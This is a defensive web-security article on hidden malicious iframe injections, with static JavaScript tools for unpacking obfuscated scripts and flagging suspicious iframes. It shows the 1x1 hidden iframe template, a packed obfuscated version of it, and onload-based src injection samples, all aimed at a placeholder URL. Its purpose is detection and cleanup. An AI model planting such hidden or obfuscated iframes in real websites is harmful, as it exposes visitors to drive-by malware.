June 2, 2022

More information on hidden malicious iframe injections

Malicious iframes have a basic configuration as shown below:

<iframe src="http://url/" width="1" height="1" style="visibility: hidden;"></iframe>

They are set up this way so that the injected iframe is invisible to anyone viewing the page. A width and height of 1 pixel reduce it to a single point, and the inline style visibility: hidden; makes even that point invisible. The browser still fetches and renders the src URL, so whatever the remote server sends runs in the visitor's browser as if it were part of your page.

These iframes are invisible to Internet users, but can be detected in the HTML code of your web page.

To hide the iframe in the HTML as well, hackers use obfuscated scripts. Besides ordinary obfuscation, they now also use what is called packed JavaScript: the output of tools such as Dean Edwards' packer, recognisable by its eval(function(p,a,c,k,e,r){...}) wrapper. Packing is a legitimate technique, as it shrinks scripts and speeds up delivery. But, as always, a legitimate tool can be misused, here to embed a malicious, unreadable iframe in your web page. When you view the HTML source of such a page you see no iframe at all, just some JavaScript with no obvious purpose, no URL, and a few suspicious-looking words inside. And since many modern pages load dozens of third-party scripts (e.g. ads, statistics, widgets, etc.), these scripts are easily overlooked by webmasters.

Let's take the malicious iframe example above and pack it. It would look like the following:

eval(function(p,a,c,k,e,r){e=String;if(!''.replace(/^/,String)){while(c--)r[c]=k[c]||c;k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('<0 2="3://4/" 5="1" 6="1" 7="8: 9;"></0>',10,10,'iframe||src|http|url|width|height|style|visibility|hidden'.split('|'),0,{}))

If you look at the code above, it is hard to tell whether it is malicious. You will notice some words that look suspicious, but they may be harmless; sometimes you will not see any suspicious text at all.

What you should do, when you are not sure whether a script being loaded is malicious, is unpack the compressed code and read the result. Unpack it statically; do not simply run the script in a browser to see what it produces, because that executes the payload. One site that can unpack such packed scripts is: http://www.strictly-software.com/unpack-javascript.aspx

Copy the entire code, starting with eval(function…, paste it into the first box on that page and click the "Unpack" button. The result appears in the second box and should be the actual code, now fully readable. Once the code is readable, determine whether it is malicious before removing it; packed code is not malicious by itself.

To hide malicious code further, hackers sometimes encode their scripts several times, so even after you unpack one layer you get yet another obfuscated or packed script. Each layer decodes into the next, and the innermost one finally creates the hidden malicious iframe. Keep unpacking until readable code appears.
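As an added example (not code from the original post), here is a static unpacker for this packer format that a webmaster can run locally instead of pasting suspect code into a third-party site. It re-implements the decoder rather than calling eval(), so the packed script never executes, and it loops until no packer wrapper remains, which is what the multi-layer case above needs. The sample is the packed hidden iframe from this post (constructed here as a string; "http://url/" is the post's placeholder), and the small pack() helper is included only to build a two-layer test case; it is not the packer's own code.

```javascript
'use strict';
// Added example, not code from the original post: a static unpacker for
// "eval(function(p,a,c,k,e,r){...}(...))" packed JavaScript (the Dean Edwards
// packer format shown in the article). It re-implements the decoder instead
// of calling eval(), so the packed code never runs, and it keeps unpacking
// while another packer layer remains. pack() is a test helper, not the real
// packer, used only to build a two-layer sample. SAMPLE_PACKED is constructed
// from the article's example; "http://url/" is the article's placeholder.

const TOKEN_RE = /\b\w+\b/g;

// Packer index encoding: digits 0-9a-z, with A-Z added when the radix is 62.
function encodeIndex(c, radix) {
  const head = c < radix ? '' : encodeIndex(Math.floor(c / radix), radix);
  const d = c % radix;
  return head + (d > 35 ? String.fromCharCode(d + 29) : d.toString(36));
}

// One packer call: captures payload, radix, word count and the dictionary.
const PACKER_RE =
  /eval\(function\(p,a,c,k,e,[rd]\)\{[\s\S]*?\}\('((?:\\.|[^'\\])*)',\s*(\d+),\s*(\d+),\s*'((?:\\.|[^'\\])*)'\.split\('\|'\),\s*\d+,\s*\{\}\)\)/;

// Escaping for the single-quoted payload literal, and its inverse.
const escapeStr = (s) =>
  s.replace(/\\/g, '\\\\').replace(/'/g, "\\'").replace(/\n/g, '\\n').replace(/\r/g, '\\r');
const unescapeStr = (s) =>
  s.replace(/\\(.)/g, (_, ch) => ({ n: '\n', r: '\r', t: '\t' })[ch] || ch);

// Decode one packer layer statically. Returns null when nothing is packed.
function unpackOnce(code) {
  const m = PACKER_RE.exec(code);
  if (m === null) return null;
  const [whole, rawPayload, radixStr, countStr, dictStr] = m;
  const radix = Number(radixStr);
  const words = dictStr.split('|');
  const count = Math.max(Number(countStr), words.length);
  // encoded token -> word, the same table the decoder stub would build;
  // an empty dictionary entry means the token stands for itself.
  const table = new Map();
  for (let i = 0; i < count; i++) {
    if (words[i]) table.set(encodeIndex(i, radix), words[i]);
  }
  const decoded = unescapeStr(rawPayload).replace(TOKEN_RE, (tok) => table.get(tok) || tok);
  // Splice the decoded source in place of the eval(...) expression.
  return code.slice(0, m.index) + decoded + code.slice(m.index + whole.length);
}

// Unpack repeatedly: a script packed N times needs N passes (capped so a
// pathological sample cannot loop forever).
function unpackAll(code, maxLayers = 10) {
  let layers = 0;
  while (layers < maxLayers) {
    const next = unpackOnce(code);
    if (next === null) break;
    code = next;
    layers++;
  }
  return { code, layers };
}

// Test helper (not the real packer): every \w+ token becomes a dictionary
// index, wrapped in the decoder stub the packer emits for radix 62.
function pack(code, radix = 62) {
  const index = new Map();
  const payload = code.replace(TOKEN_RE, (tok) => {
    if (!index.has(tok)) index.set(tok, index.size);
    return encodeIndex(index.get(tok), radix);
  });
  const words = [...index.keys()].join('|');
  return "eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c]);return p}('" +
    escapeStr(payload) + "'," + radix + "," + index.size + ",'" + words + "'.split('|'),0,{}))";
}

// Constructed from the article's example: the packed 1x1 hidden iframe.
const SAMPLE_PACKED = String.raw`eval(function(p,a,c,k,e,r){e=String;if(!''.replace(/^/,String)){while(c--)r[c]=k[c]||c;k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('<0 2="3://4/" 5="1" 6="1" 7="8: 9;"></0>',10,10,'iframe||src|http|url|width|height|style|visibility|hidden'.split('|'),0,{}))`;
const EXPECTED_HTML = '<iframe src="http://url/" width="1" height="1" style="visibility: hidden;"></iframe>';

function demo() {
  const single = unpackAll(SAMPLE_PACKED);        // the article's case
  const double = unpackAll(pack(SAMPLE_PACKED));  // the same script packed a second time
  console.log(`${single.layers} layer(s):`, single.code);
  console.log(`${double.layers} layer(s):`, double.code);
  return { single, double };
}
if (typeof require !== 'undefined' && require.main === module) demo();
```

Treat the output as untrusted text: read it, do not execute it. The unpacker only understands the single-quoted payload form the packer emits; a script that uses a different wrapper still needs manual review, and a packed script that had no business being packed is itself a finding worth following up.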

Further investigation into malicious iframes has shown that antivirus vendor Sophos warns of a new injection attack that has infected thousands of websites with malicious iframes. To avoid detection, the unauthorized iframes get their src attribute (their URL) from a JavaScript onload event handler. Aside from heavy obfuscation, this attack uses a specific trick to bypass web scanners: decoding the string yields an iframe that has no direct src value; a JavaScript onload function generates it at runtime, so a scanner that only looks for iframe tags with a suspicious src finds nothing. The src usually points to a third-party server that tries to infect visitors with malware. This often targets vulnerabilities in client software, so be sure to install critical patches for popular software like Adobe Reader, Flash Player, the Java Runtime Environment, Microsoft Office, and Windows itself. When you unpack the code, look for this pattern.
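As an added example (not code from the original post or from Sophos), the following scanner picks out iframes that match the patterns described on this page: a 1x1 or smaller size, a hiding inline style (visibility: hidden, and also display: none, which hides in the same way), and the onload trick, where the tag has no src attribute and a handler assigns one at runtime. It works on page source with regular expressions so it can run outside a browser, for example over a saved copy of a page or over the output of an unpacker. SAMPLE_HTML is constructed; "http://url/" and example.com are placeholders.

```javascript
'use strict';
// Added example, not code from the original post or from Sophos: a heuristic
// scanner for the iframe patterns this page describes. It works on raw page
// source with regular expressions (no DOM needed), so it can run over a saved
// page or over unpacked script output. SAMPLE_HTML is constructed;
// "http://url/" and example.com are placeholders.

const IFRAME_TAG_RE = /<iframe\b([^>]*)>/gi;
const ATTR_RE = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
// onload handlers that set src: this.src = ..., x.src=..., setAttribute('src', ...)
const ONLOAD_SRC_RE = /\.src\s*=|setAttribute\s*\(\s*['"]src['"]/i;

// Attribute string of one tag -> { name: value } with lowercase names.
function parseAttrs(attrText) {
  const attrs = {};
  for (const m of attrText.matchAll(ATTR_RE)) {
    attrs[m[1].toLowerCase()] = m[2] || m[3] || m[4] || '';
  }
  return attrs;
}

// "width: 1px; visibility: hidden" -> { width: '1px', visibility: 'hidden' }
function parseStyle(styleText) {
  const style = {};
  for (const decl of styleText.split(';')) {
    const i = decl.indexOf(':');
    if (i > 0) style[decl.slice(0, i).trim().toLowerCase()] = decl.slice(i + 1).trim().toLowerCase();
  }
  return style;
}

// True for a bare number or px length of 1 or less ("1", "1px", "0").
function isTiny(value) {
  if (value === undefined) return false;
  const m = /^\s*(-?\d+(?:\.\d+)?)\s*(px)?\s*$/i.exec(value);
  return m !== null && Number(m[1]) <= 1;
}

// Returns [{ tag, src, reasons }] for every iframe that looks hidden or evasive.
function findSuspiciousIframes(html) {
  const findings = [];
  for (const m of html.matchAll(IFRAME_TAG_RE)) {
    const attrs = parseAttrs(m[1]);
    const style = parseStyle(attrs.style || '');
    const reasons = [];
    if ([attrs.width, attrs.height, style.width, style.height].some(isTiny)) {
      reasons.push('1px-or-smaller size');
    }
    if (style.visibility === 'hidden' || style.display === 'none') {
      reasons.push('hidden by inline style');
    }
    // The trick reported by Sophos: no src in the tag, onload assigns it at runtime.
    if (!('src' in attrs) && ONLOAD_SRC_RE.test(attrs.onload || '')) {
      reasons.push('no src attribute; onload handler assigns src at runtime');
    }
    if (reasons.length > 0) findings.push({ tag: m[0], src: attrs.src, reasons });
  }
  return findings;
}

// Constructed page fragment: one legitimate embed and three injected iframes.
const SAMPLE_HTML = `
<p>Welcome to our site.</p>
<iframe width="560" height="315" src="https://example.com/embed/legit" title="video"></iframe>
<iframe src="http://url/" width="1" height="1" style="visibility: hidden;"></iframe>
<iframe width=1 height=1 style="display:none" onload="this.src='http://url/'"></iframe>
<iframe onload="this.src='http://url/other'" style="width:0;height:0"></iframe>
`;

function demo() {
  const findings = findSuspiciousIframes(SAMPLE_HTML);
  for (const f of findings) console.log(`${f.tag}\n  -> ${f.reasons.join('; ')}`);
  return findings;
}
if (typeof require !== 'undefined' && require.main === module) demo();
```

The heuristics are deliberately loose: a legitimate tracking pixel or a collapsed widget can trip the size check, so every hit still needs a human to look at where the src (or the onload handler) points. A hit with no src and an onload handler that builds one is the case to prioritise, because it is the one that plain src-based scanners miss.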
